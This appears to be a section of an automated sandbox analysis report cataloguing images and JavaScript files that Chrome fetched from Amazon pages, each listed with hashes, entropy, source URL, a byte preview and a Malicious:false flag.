                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!.1A..2Qa."qr..BR..#3T.....%S..............................................1.A............?............../...<..1..s......1.LEZ.{G{.c.{.....F..^.......E9y.....5..N...[8.._.H.i..M./....W....&TSJ.b..F8=...}...............5..<X.?...]c.SI.E.=.6.'...U.a.9(.C\k+...l....D.q...m8=.;.3'.4.`..=LL9..B!.JJ(.A-...J.e..w1.......Q*k.~..k3..ANG./Y|..^......U......u.#Id}CK.`..j.v...%.e-... .....G...8...z..i.T...D.`..2&.......'2W....R.n....C/.I.V....m.v#.R.:..#.a*.5...R<.|.bf....l.VK.a.,OC5.... ..z7t{}B.....W..Ps|..,g.Q.1.../N..T........DNn..G...I.1..l..h.....f..$?..wo_.v..T.""." ""." *}.G...{=..*h..}.Hr`W.k....Ub.\.|,..6.`..n...!...s.I.N.z...v._..a..0...{3{.>2*#.l8q6 .P..I..y.#...hh.h.4..........}.,..[i.F.i._.-..\E.{FE.....U2.I....v@....6<...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 450x320, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):23784
                                                                                                                                                                                                                                                                Entropy (8bit):7.96390765715884
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:tHmuF19kJRob+neJ/7ByUL5VcS48tXleFTM+lnA9TTF3NtWHKOufR7Ft1sNxvioW:Z1kaByy5Vis8ln0TNNQqOIpQvrW7U47v
                                                                                                                                                                                                                                                                MD5:E6F1FA370024229FA8D5D45ACC6D7CCD
                                                                                                                                                                                                                                                                SHA1:7E396512D48A22FA024474AA2451C392AD13D0B2
                                                                                                                                                                                                                                                                SHA-256:F41386667175E16D7F12998499F9175ECBADED93A2C0F4E080F4F4355C5F1C49
                                                                                                                                                                                                                                                                SHA-512:0DF522686DA4665D932BF116F0C2C87F53C3F05B56B4F6AB340882DEB07534EF4D1B5D327BA333617FE5D10ED353AE4A0D0E8C5C8469DD6E1B59350EA91E1251
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........3................................................................,......................................................<.@@r.....@S%...H.TF.dH...c..f).L.9X/.R.,..f......&.^.".e...LQ[;.2i..Nv..3x...........8..8....-..sF....Y3o+.(+JV._y....gu.Gn...P...G>V...%..;*..#.r..+..zn...D)%.KIN=..[!.uv...**.j...~..N...........M...O6.....<D.=.=..+.[d.......6F...Q.~.3.-...h....U...p.+....u.,S..U.}...G..e..y...W.6..3.O.... ....g.............0..O'....w...K........eM.....MR....k;E.).8...G..z4..~j.x..p.R...wN=.B._.h...+h.hU..Y,..R...@......7..a..gNom)Z..in ........|..Z.7..J.g4....T.>.\.5.a.-..htv>.m.XF.....`s.[.e/...O|.....+.m.j...).Q.Nu......N...5..u....(../........<...5Bmd.EM.w1.>.%d.n.....`..U~..?/..k.......n.m8.5..t.u.m.....-}4..oM.5.R..K.P...-.#.I......v.{.j*....9e]A..'T.Y.L.-.M.m.....
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5618
                                                                                                                                                                                                                                                                Entropy (8bit):7.937103938750826
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:74aNeNu9xEgvzpbaknI2XelswS/kXcrpAIsV4PeQFE3DYcmY5M56zI++:+NoRvVOkI2XeeBkEts6WQCTZJ5xzl+
                                                                                                                                                                                                                                                                MD5:072CD502E6F76378C71338E4C5381111
                                                                                                                                                                                                                                                                SHA1:C92B3A72A3018B2DB2A08275C150F9B1C075FF38
                                                                                                                                                                                                                                                                SHA-256:EED115D8945646EFAB77BF5C100DDCB1126322B9E0996A77A8CFEC170516EAED
                                                                                                                                                                                                                                                                SHA-512:7533EE9CA62BC688BF8A5FAECD39FA400CC9115A43D6B27A36398BA05395258D1FAECC6099BCDC17A36E3ED92CB3F9237A72C63F0E5BE7C4E3216B96FE428168
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..............................................................................#.......................................................................t...."................................................................!1..AQa."2q.....#Br...$b....C...%34DRS.................................................!1.A.2"Q.BRaq.............?..S..(..p>".Rf.I.F`..?QEV.j....x....A.....yg.Mi'...y.[.m....r[57.1a.+.2..r|.&..k.X..v.....W.v..rU..K..B........m."W.ep..M......umo.n,.~x.W<.o..t'..1.px....C.....3.j.Y..t....R.....o,....I..m=/ma..$vYs.Ku.I.ob.U\....eoDfj<Yy4.V...|Y.56~n.".e.Z... U...m...B..U.Cr...|...d^F........]...z....*,`.M...I...Q...W.Y.. 8........XO+..4Z.....&,...O...)i.....$..a.&.E.cV.0....+.......m....XA..w....37^t...j;....4..[.?.5w...6A.F.x....;........J..#.p.N....4\.ES.].....4+k..J.|.h..<...#.M.M.L...../.. .Z.I!...Tr.+-....n..:..%7.EA..G.-G.....#.(".di.T;\..U..w]}..o.w.MZy{..hfZ.2@./6....[.*.s-.7\R..1..)~$..j.d...d..q......j...c.2..u..V....+
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 100 x 100
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):15331
                                                                                                                                                                                                                                                                Entropy (8bit):7.845249880729631
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:g8ozCbxjsv+KtKSbln83pocNAAGV4K9Lk5R:g8/bxjsvJKC83VAAGV4KhkL
                                                                                                                                                                                                                                                                MD5:0E28DAF1A16F1C39C32DEC29F4084DDF
                                                                                                                                                                                                                                                                SHA1:1AF74FE87992C48B734D5C68F8AB795E0E9E3759
                                                                                                                                                                                                                                                                SHA-256:7AF9039026D259AA4649A5B1F3D6DADCE932241441A7CD899DB50E72283197E6
                                                                                                                                                                                                                                                                SHA-512:1F2FBD5B32DCBB1B4EE9A151BD3D8ACA30919778320DBC856E6F6F18A8D3EC0D92596828A572D4DB9DDDE5346B0219EB91607651723700B0E56A97E530B76968
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-na.ssl-images-amazon.com/images/G/01/payments-portal/r1/loading-4x._CB338200758_.gif
                                                                                                                                                                                                                                                                Preview:GIF89ad.d.........H..Y..................................(....r......z..h.......8.....................!..NETSCAPE2.0.....,....d.d.....'.di.h..l.p,.tm.x..|....pH,...r.l:..tJ.Z....X.*.A p..&..b[#("..xN../..e.!.]..q..tcwvy.......)........x.......$.p.........................~Z....rs........kX.`...........W.......u......U.............S....@...{......a.(..J.W..sw..Z.!.wN&I.Xa =[.*.<P............B.8.4).A...).$A./..(...!.hJ...I...P_$.........y#....*..........x..g..g...K...p...................p.A....N...G....6......x;.x.9.`.D,.>.Y. .\.m.........x....B70..7.!..K.~:+....k..........`$.W......<<....XH.^......N.....u.@...g...Y7....u...........q.A.a...a.~.U..hH\........,.....Q...`.A......<j._...h.D.....l...K6.A.JX@.6rpd.Xf..C0@......d.I.(6...h...er..o....x.5g.....?.)C......0 P..X.#.-0.g..6.i.n4.@..By...r.@..~....::.r.JB...*k...*..".k..z.....k...@...&.i.'..l..2....p,...J+-..2...N...`.....Tm.1E{...(...K/.....J{/./..(....p...P..#.0..7........k.....S..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4298
                                                                                                                                                                                                                                                                Entropy (8bit):7.721950923074436
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TMCHHHp/vAHR9LboChebnvYCEm9qBlELcdzxgh+8N8TlbNU6oS0n:oCHRvAxlXCj9odzxgE8GTlbN1T0n
                                                                                                                                                                                                                                                                MD5:75EE799AC2BCC19DE41DE2B550006340
                                                                                                                                                                                                                                                                SHA1:1104E08C1A0A6D97F32BB8B28200FD0080199637
                                                                                                                                                                                                                                                                SHA-256:6A14D3AEB6133C1A65CD5D7CFA3CA8FD7FA4B0437F772EB4173F464A1F18CD3A
                                                                                                                                                                                                                                                                SHA-512:307BF9B364FD32590C04491A74F2325FD8D3722875B00FDDC8A30B47B5ED058E79225FF2FBDD32F43B9DE7A6C7E22FC46EEF20732B5058A5ED685839D7108D8B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/31aozKg0dqL._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........1..............................................................X.....GI...d....B..........xWVC.j....}9....6........"2.2.+.F.;...x.Z..-.1..........^..v..?.K.......-.1............y.sff...[....4......XI`<.....z~y...K..2.r.>.)....H..4........C..OR..Y.o.-.....1'.Cp....}.Y|..........{,.r_.<-..}...6...OvuE.....ac].(.....XFn*.Y....+.......nv1..\X4sB1h........j43^.@.U.M..,7gq.=.:.K................B...oAv%................X~...4.....)M..FQz..G.J...%..-........ketO..B7.1b..d...:{.%.Ucs.....1..G...d}..@......u>;.....y$......p.q.......,..........................!1@.."#2A .0BPR3............[m.}.U.3...A.......|...y;.kS.6..:....q.M#./....\~....mj......*.n>q3z....>.l3.'HG.E.@.M,l.......m.e....L..../...Z_.}}Y..Y_...........Q*.ZW..}..d...y..Bf.K.U..G.....d.....T.`j...m.U.NE.0......6Q...q.i..L.3....fE.l
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1922)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):423055
                                                                                                                                                                                                                                                                Entropy (8bit):5.746869127772581
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:uERrns7Gth0wXdoyl2O+zLwkGlp2Aql58L1SlKglC2xsng9aF:ugnsmh0wx2O+xGr2VlyL1SlKb28F
                                                                                                                                                                                                                                                                MD5:FD271D08E98605649B63E1FD2A46A109
                                                                                                                                                                                                                                                                SHA1:FDBC7E8BB168DE20047CCDA7646FF9F62F80A0C4
                                                                                                                                                                                                                                                                SHA-256:4F3AE3BBC75BFF3EB7BD6444FFA91907B21A86ED41526193A0A88DD28644C694
                                                                                                                                                                                                                                                                SHA-512:C5468D1D738E3424EFF00E773F7E570A26D5FD0855F4EDC248AA0F0F0DF6579C333520707892677F1653B2E7E443F0A483F0520768D21919E856F5B3B5B1937F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://www.amazon.ae/service-worker.js
                                                                                                                                                                                                                                                                Preview:(function(){self.getServiceWorkerGlobalClientConfigData=function(){try{return JSON.parse(decodeURIComponent("%7B%22deviceProperties%22:%7B%22appType%22:%22web%22,%22deviceType%22:%22desktop%22%7D,%22marketplaceProperties%22:%7B%22countryCode%22:%22ae%22,%22marketplaceName%22:%22Amazon.ae%22,%22obfuscatedMarketplaceId%22:%22A2VIGQ35RCS4UG%22%7D,%22namespaces%22:%7B%22in-latency%22:%7B%22lightsaber-web%22:%7B%22data%22:%7B%22clientEnabled%22:true%7D%7D,%22lightsaber-mshop%22:%7B%22data%22:%7B%22clientEnabled%22:false%7D%7D%7D,%22lightsaber-rule-levers%22:%7B%22bazaar-gateway-mshop-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22buyagain-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22cart-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22browsepage-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22search-mshop-android%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%22detail-mobile-web%22:%7B%22data%22:%7B%22ruleEnabled%22:true%7D%7D,%
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 150x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8553
                                                                                                                                                                                                                                                                Entropy (8bit):7.947440671300608
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:X4CJj/8uZbow0HLu7ZybdBHfnezOVEWC2OOq:X4ej/cw0Hy7ZybX/ezOVEF2Dq
                                                                                                                                                                                                                                                                MD5:D03FA8ACF7B75B5CF51B40E0BBC64337
                                                                                                                                                                                                                                                                SHA1:0312702DB94BE68D6140BD5521D7BB6EC05F6B1B
                                                                                                                                                                                                                                                                SHA-256:3F63FE9E2447D013AC97B05373F5E97A3DDEF003AD425B602D589C29AE4926D0
                                                                                                                                                                                                                                                                SHA-512:C9B27A963E7C89E1F659FC8264F0C5F897569465287FA009962CF3CCAD8BF15263C2C620C62A46E4452853D6115447328A8A84E861D7835E0C7E461057F15F30
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61SpqN46FvL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!.1.".AQaq...#2R..5Bbt..c..4CSr.....$s..3....................................................!1.a."2AQq..4.....#Br..3.............?.G..6s...z...v.-.(,Ta.A\......&..D.my$...U.^.2>y.....7....m.w.K.k.p...P2.P.$.....umB..k~..k..F.)....[(.;.>...U....>8...9....>f h.MyN....\....A+.....G.....}O.o......VR.....%0..\..ST*(........es..V......1*..7c..sX..z}\...d+..fFS.G....%..;U..!.CH...J@.`.!fq.P..b......S.5U...U[..d.w;..w0....pA!I.a.C.D!E.Q.QE.B......?.M,...K..}f$%.a..d#.b].....<..x...u.6....[...Oo....o.5....(.8..*I...;v.B.xS."...6S.r...)..{..5....].....3....F...*.%......J.Hs.ZgF...?....Y...'...bB.iaB+.S6..d[...);.........QEiN*7z.X}..l..9Z..eIS...n\...?I.u.......f.H.]d6.....j=(~.O...).J.(r:..s9..{..(..n'.(..B.(....(.(..!.(..B...Fm!H| .s..;..f..T
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4521
                                                                                                                                                                                                                                                                Entropy (8bit):7.8120881867521925
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:LUGuCloDgu088d96JMa7oV3wySlszcHsQVZY+oFqT5DV82:LUGudgndd0J17SyFMQVZYUr1
                                                                                                                                                                                                                                                                MD5:EDBCD73DB073CECBD97B7A4A9B63286F
                                                                                                                                                                                                                                                                SHA1:2F9FF0AAA3C47AEE01A17772FF56C736476CA5E2
                                                                                                                                                                                                                                                                SHA-256:00225623C559C59037352A965875DE2865D043398AF152F76A36ACE7E2EE86FF
                                                                                                                                                                                                                                                                SHA-512:78176D6580664DF74260E03485EE3A261677FF2A4F99EAF2729A6176FF3226B1E208432076CA9667F298EDA4641BCB403505697DB9A68EF3473AF492CC148E63
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................t...."..........:.........................................................................b......A........;..*.7..h!J.=..=......3.4.T..a...z...d.ua......ZCo..z.&.-xTZ.j...D..i.......n,.e;....R.......T...............2Q(.e..o.]....oJ...k.......z.\f1<...]..;.".R...z.....Fq7.F..w$Q...A+...2.........-h.Z....6....v.v..lb.' ..@.R.z.9..y...q\...ez@...C.....k..|......%.F...s....|r.~C................T.............................!1...$%5AEU..&0equ."'4DFQRT..... @Prv.....6BVWa..............?.....j.6&..V8/....~.,.....5..--........Y..PZt..m........R.O......l..-S.G+.......SW.... .....B..n...m+P[M..!...........-........p.*..O~..<.O.@U'..}..1..1...f...;..dD..>.......5$.........l6..... ,F..P.$Z.n.._/..(.5....L...-.qC.c.p$......].gf.^..+....nN...p.fI?.....5X..:..j....=&..6m..Gy.]..s..",qC.<.a....P..1
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:PNG image data, 132 x 235, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):13199
                                                                                                                                                                                                                                                                Entropy (8bit):7.954935066574483
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:rH0E+WSNeZU6PNg1A0KxVaF5bXXt7qYs9lcCHihS5WC9tEAxvVy4yK+ezneiTs4Q:rHpXSJSNg1A0KxC5jUDcvuLxvQlziLI
                                                                                                                                                                                                                                                                MD5:4AB8824103871D92816E2A084A05949B
                                                                                                                                                                                                                                                                SHA1:85C43DB1559578D308AE8CEE328CC4483352A649
                                                                                                                                                                                                                                                                SHA-256:958E3858A8659187AD3BC8E723E0C6A1C2415C6AE40023B40CD0289D0E2DF366
                                                                                                                                                                                                                                                                SHA-512:A5705C4177AC542244E6BA77BEDFC19BB69823B16206A1C086A2719DB9239222B8DAA0F808B6535BFCB479D0504C63E1597594D8FC2F9AE7DB03F0AE72242DE6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/sash/x6ok$LYiGGUKJXl.png
                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...............>(....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:b3e090dd-84c4-4674-9fe3-59f5a5bd6db7" xmpMM:DocumentID="xmp.did:AB1D71FA873C11E6A935C06C3689B1A4" xmpMM:InstanceID="xmp.iid:AB1D71F9873C11E6A935C06C3689B1A4" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:f301801f-ea81-4562-919b-633c17b77694" stRef:documentID="adobe:docid:photoshop:9b6ca99e-cfa6-1179-9606-c490b53d51cf"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Z..k../.IDATx..}.x
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 157x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):11046
                                                                                                                                                                                                                                                                Entropy (8bit):7.962751215656187
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:azNL1mQtAXBIGCoUd7HpTep6o3gqEN0y2pMQZtGNMx/B25OIboIv1edW8b:gp7t0IG1yTI6o3gqEN0y8QNCB25FbhoR
                                                                                                                                                                                                                                                                MD5:F3FCA6EB3FB89CAC95E467365156702B
                                                                                                                                                                                                                                                                SHA1:C04F6A3B359E541344DEF1FB8C05FAFE6C0C59A5
                                                                                                                                                                                                                                                                SHA-256:EE9FD422662B3AC01AE8AAB40D2172CAF6159F46D21D2E12F66D6BF80249F38A
                                                                                                                                                                                                                                                                SHA-512:A80ED0A3E8F7FF5F07B02F4F5E9617FF579CB33C897BE86F5E6C2CDA669A71239691A337D59AB3762F9D1D49319D455A1F248FB4FCC5240E4ECB84CAC3D5F3AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71YJXiyG3LL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!.1."AQq..2R....#$36Sartu...5BDT......&'.4E.....................................................!.1AQ....R."2aq......#$4S...............?...K...$...$....'...u.u_.i..........o.......<.).'.Z.f`..!..7$c.!..^......4..6...4U....=....=..[]..`m...ue...;..1.w.U#s..8!.}..Z.L...KG52.0E.O.g.....b.X..m.?R.....K.j...V..tb.C}.!K.......'..Cp...k..Yo............rZ..G.X....+k1a._....O.0e..+......7/.:'...............6>1gr7?.B.%.UpcKO,.M......%U.....0....-......o..[.VkO..II...".m....#....|/.Xb...U.]].f.d..SI;..C..ddtx...&..........<g5D.6D5.....q....4..I.q..TF...QGvh.._.v .s.O.|..*.^.S.$E....r....S.?....#B.,.._....w.|...a.Z..2....MTiv.0.}w.G....6u:....I.m.u..;.l8....i2..z.U.;..]....`.J...S"UP~.XCa...Ck`d9.....@.F..q......o+.E...,.....I:.#C g.(cew.E
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 173x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5994
                                                                                                                                                                                                                                                                Entropy (8bit):7.932454865180586
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TBPjYyaR49ufNA19l+PM3e3qn91QVuDD0kiU51EbMDh1GSJDkNm/EAR8N6WSZnc3:5jY3QufNA1j+PMO6n91QOD0vU51TLGIA
                                                                                                                                                                                                                                                                MD5:1D7CDC757680BCAC8C1AA646EB9C2064
                                                                                                                                                                                                                                                                SHA1:A6AF28D867F3963341F89A5B2CF8A6FBF75F7157
                                                                                                                                                                                                                                                                SHA-256:B536A0BEC12207832091E68BDB62BF981BCB48DA2B21217F78212F7960B86C89
                                                                                                                                                                                                                                                                SHA-512:B603531B04A83DDF8B94DE409583CF4BB2AE2F199ED29939E4C88D064D36D57E628892DB5EDD75EA2E9AC3944DBCF460AE51B9643693524A8559F40C1B949AF7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71-ANz0gizL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."................................................................!..1Q."6Aaqs...2.......#3Tr...BCDRS.....EUb.....%5c...............................................1Q....!S..ABa..............?..t.(..(..(..(..(<.Q../....m.-.e.$*..C..(..&.>.u.=......M!...;E.....y..;3"V...Q.4...y$.2.z.P...h,.{;.(t...#.F...1...s...M.]N.....N3..pG-...]".s.......S.....,.o."..w.~+...u.....#7iU.O%^x.".R....q.E...<3j...p...O..i*FE........O.Wzq^.....~.......j...d.....pw.~....qF.Y..9......w.WC....y..>..W.~.'..C...E........v..2j2.~..l.<.,..?.D...)~.5.2.<s'....]6...%CU..8.D...l......xP.{Y...}y...Ak;>.aq..Kk..*F.....E....0O0=../..Q...5+='..n.n.C.#....XM................8".Al....<.....I.'...J. .?.I.p..<...U.....x.)@.)@.)@.)@.)AR.. ..ku........P.1l#..%H.........b..sx...w....C3...|..'..?Ej......W....s......7.-.F}D.;...S.5I
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):5883
                                                                                                                                                                                                                                                                Entropy (8bit):7.9280903519457535
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:T++6JbvofzKaSmWmiUVrSkSFldApmfz2heog7mX1GWm/56lSYifgPm+LZ:y+6dofzKaSCSkSFlapmfz2hdg7WwWS5i
                                                                                                                                                                                                                                                                MD5:5C8FC228808F298A67D08CD1CF1B6FC2
                                                                                                                                                                                                                                                                SHA1:2E8EAB300E44806A25A1EBBDE8E3691E06FAA88C
                                                                                                                                                                                                                                                                SHA-256:D793AC4E877E8CE3F11ECF4114E1EB815BDD4B8878F397452B60495FFFFFA83E
                                                                                                                                                                                                                                                                SHA-512:0D791F46D1D0B3418C7FC7A44D9530DC749F2A1B26F14609138DEEDBA824344C75AD24142663F29889F37A23E65F262E48120F764357A8CCC0C10BADC1474366
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/51B00IVUMIL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................1!Q...A"2Saq.....35Ts....#46Rt...C..$BDcr.....................................................!1..q2AQa"..#3BR.............?..d.f.=.#.[.JQ...].!7..p......G.Fa..>t.P..<..X...Z.4k<.f..Zi$|R.7S<`.O......Ita..f..Fe.<.S8.d..U.s.Z....F..b.NfZ.4k<.+T.7.!.........4k<.i.........f...k.s......QI>..H[4.Y.g.D.b;}.VCW8.....r..,...).)IY=...Y.g..$.&....|.H....Y;).....G...V..IrX..pM.....4k<.(T.......b..Z.....b..]c....sZ...;...j\....B....%....7?....@.e"..x.....q).[k.6}gR.9n..}...U$..4........J>..j..U.....ki.....u/ny.[....N..&X-T......c.{^....4.......\I.k!n.8.M...yo...X8O..7............s....s.....3....CQWM)B..q|=...#S.o.q.4t.....d.w[ i#=..VX_..EIS$0..@r0..0...70...OK%t..../..ba.O7<8....k..3.=.Uy..;...i.M...{..x.k.~E:N.......s....1..=..n.0..\...*hnq[..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (608)
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):181147
                                                                                                                                                                                                                                                                Entropy (8bit):5.399333328109369
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:7emi3shSYWTwt9VwNSn5qPsMomEW1whuuVIZ:7Vi3scYnVwNSn5qPNomEW1wMuqZ
                                                                                                                                                                                                                                                                MD5:85831553613871261E4BCC9A3CD3ABF4
                                                                                                                                                                                                                                                                SHA1:1CFBE1157C267BD2CE19AD2F19AE4C7C198AC328
                                                                                                                                                                                                                                                                SHA-256:F159E8FFE5FC13AF167254BC6D2F1090774E5322BD3993A81A2A657D4159AA3F
                                                                                                                                                                                                                                                                SHA-512:5B45F985066EE2D47B9A7B3C713FB1EC87AA790F25ED443D4F3A9BDF32FB91A174F88F5FD6481736010546C55DDE6E7413BE9E7A01E6BF54B39FA5CEF72DE6EA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/I/71MFMsTQG0L.js?AUIClients/IdentityWebAuthnAssets
                                                                                                                                                                                                                                                                Preview:/*. regenerator-runtime -- Copyright (c) 2014-present, Facebook, Inc. -- license (MIT): https://github.com/facebook/regenerator/blob/main/LICENSE */.(function(I){var y=window.AmazonUIPageJS||window.P,p=y._namespace||y.attributeErrors,H=p?p("IdentityWebAuthnAssets",""):y;H.guardFatal?H.guardFatal(I)(H,window):H.execute(function(){I(H,window)})})(function(I,y,p){var H=function(){return function(t,y){if(Array.isArray(t))return t;if(Symbol.iterator in Object(t)){var E=[],H=!0,b=!1,c=p;try{for(var a=t[Symbol.iterator](),e;!(H=(e=a.next()).done)&&(E.push(e.value),!y||E.length!==y);H=!0);}catch(g){b=!0,c=g}finally{try{if(!H&&a["return"])a["return"]()}finally{if(b)throw c;.}}return E}throw new TypeError("Invalid attempt to destructure non-iterable instance");}}(),t="function"===typeof Symbol&&"symbol"===typeof Symbol.iterator?function(p){return typeof p}:function(p){return p&&"function"===typeof Symbol&&p.constructor===Symbol&&p!==Symbol.prototype?"symbol":typeof p},ba;(function(){function E(b
